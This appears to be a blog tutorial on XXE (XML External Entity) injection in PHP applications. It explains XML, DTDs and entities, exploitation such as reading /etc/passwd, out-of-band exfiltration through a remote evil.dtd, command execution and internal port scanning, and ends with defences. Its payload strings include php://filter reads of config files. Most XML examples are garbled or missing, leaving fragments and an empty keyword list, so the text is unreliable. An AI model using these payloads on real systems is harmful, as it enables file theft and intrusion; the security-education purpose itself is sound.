Understanding XXE Vulnerability: Exploiting XML External Entity Injection

Network security

“`html

XXE Vulnerability

XXE vulnerability stands for XML External Entity Injection, which is an XML external entity injection vulnerability.

XXE vulnerability is typically triggered at locations where XML files can be uploaded without filtering. This allows malicious external files and code to be loaded, leading to arbitrary file reading, command execution, internal network port scanning, attacks on internal network websites, initiation of DoS attacks, and other hazards. To understand XXE vulnerabilities, it’s essential to grasp the basic knowledge and understand the fundamental structure of XML documents.

XML is used for marking electronic files to provide a structured markup language. It can be used to tag data and define data types, allowing users to define their own markup language as a source language. XML document structure includes XML declaration, optional DTD document type definition, document element

XXE vulnerability>

Introduction and Purpose of XML

XML is designed to transport and store data. XML documents form a tree structure starting from the “root” and then expanding to “branches and leaves.”

XML allows authors to define their own tags and document structures.

Building Blocks of XML Documents

All XML documents (and HTML documents) are made up of the following simple building blocks:

  • Elements
  • Attributes
  • Entities
  • PCDATA
  • CDATA

Below is a brief description of each building block.

1. Element

Elements are the primary building blocks of XML and HTML documents. Elements can contain text, other elements, or be empty. Example:

body text in betweensome message in between

Examples of empty HTML elements are “hr”, “br”, and “img”.

2. Attribute

Attributes provide additional information about elements. Example:

3. Entity

Entities are variables used to define common text. An entity reference is a reference to an entity.

4. PCDATA

PCDATA stands for Parsed Character Data. PCDATA is text that will be parsed by the parser, and entities and markup will be checked by the parser.

5. CDATA

CDATA stands for Character Data. CDATA is text that will not be parsed by the parser.

XML Syntax Rules

  • All XML elements must have a closing tag
  • XML tags are case sensitive
  • XML must be properly nested
  • XML attribute values must be quoted
  • Entity references
  • In XML, spaces are preserved

Function Introduction

Introduction of file_get_contents function

The file_get_contents() function reads the entire file into a string.

Introduction of php://input

php://input is a read-only stream that allows access to the raw data from the request.

Combined with file_get_contents(php://input), it can read data submitted via POST.

Introduction of simplexml_load_string function

The simplexml_load_string function in PHP converts an XML formatted string into a corresponding SimpleXMLElement

XML Injection Echo Output Function

In PHP, you can use print_r(), echo to output the desired content.

Code with XXE Vulnerability

Testing POC in PHP

file:///path/file.txt

http://url/file.ext

php://filter/read=convert.base64-encode/resource=conf.php

DTD (Document Type Definition)

The purpose of DTD (Document Type Definition) is to define the legitimate building blocks of an XML document.

DTD can be declared inside the XML document or referenced externally.

1. Internal Declaration: ex: Complete Example:

  <!ELEMENT to      (#PCDATA)>  <!ELEMENT from    (#PCDATA)>  <!ELEMENT heading (#PCDATA)>  <!ELEMENT body    (#PCDATA)>]>  George  John  Reminder  Don't forget the meeting!

2. External Declaration (referencing external DTD): ex: Complete Example:

  George  John  Reminder  Don't forget the meeting!

And the content of note.dtd is:

<!ELEMENT note (to,from,heading,body)><!ELEMENT to (#PCDATA)><!ELEMENT from (#PCDATA)><!ELEMENT heading (#PCDATA)><!ELEMENT body (#PCDATA)>

DTD Entities

DTD entities are variables used to define shortcuts for referencing plain text or special characters, which can be declared internally or referenced externally.

Entities are divided into general entities and parameter entities. 1. The declaration syntax of a general entity: Reference the entity as follows:

&entityName;

2. Parameter entities can only be used in DTD and the declaration format of parameter entities is:

Reference Entity: %entityName;

1. Internal Entity Declaration: ex: <!ENTITY eviltest "eviltest"> Complete Example:

<!ENTITY copyright "Copyright W3School.com.cn">]>&writer;©right;

2. External Entity Declaration: Complete Example:

<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">]>&writer;©right;

Supported Protocols

Protocols supported by different programs are shown in the following diagram: ![](

Among them, PHP supports more protocols, but it requires certain extensions.

Exploiting the Vulnerability

Exploitation of Echo-Capable XXE Vulnerability

Reading Document Files
]>&xxe;
Reading PHP Files
]>&xxe;

Principle of Non-Echo XXE Testing

Request XML

 

&e1;

Server DTD

Use gedit to set the contents of test.dtd to the file contents shown in the figure below.

Use Wireshark to Capture HTTP and View Information

XXE Attacks and Their Impact (XML External Entity)

XXE Impact 1: Arbitrary File Reading

This case involves reading /etc/passwd. Some XML parsing libraries support directory listing, allowing attackers to further attack by listing directories, reading files, and obtaining account passwords, such as reading tomcat-users.xml to get account passwords and logging into Tomcat’s manager to deploy a web shell.

Data can be sent to a remote server.

The content of the remote evil.dtd file is as follows:

After triggering the XXE attack, the server will send the file content to the attacker’s website.

XXE Impact 2: Execute System Commands

This case involves executing system commands in a PHP environment with the expect extension installed. Other protocols may also execute system commands.

XXE Impact 3: Internal Network Port Scanning

This case involves probing ports 80 and 81 of 192.168.1.1. The “Connection refused” response indicates that port 81 is closed while port 80 is open.

XXE Impact 4: Attacking Internal Network Websites

This case involves attacking an internal Struts2 website and executing system commands remotely.

How to Defend Against XXE Attacks

1. Use the Function to Disable External Entities Provided by the Development Language

PHP:libxml_disable_entity_loader(true);JAVA:DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);Python:from lxml import etreexmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))

2. Filter User-Submitted XML Data

Keywords:

“`

Share this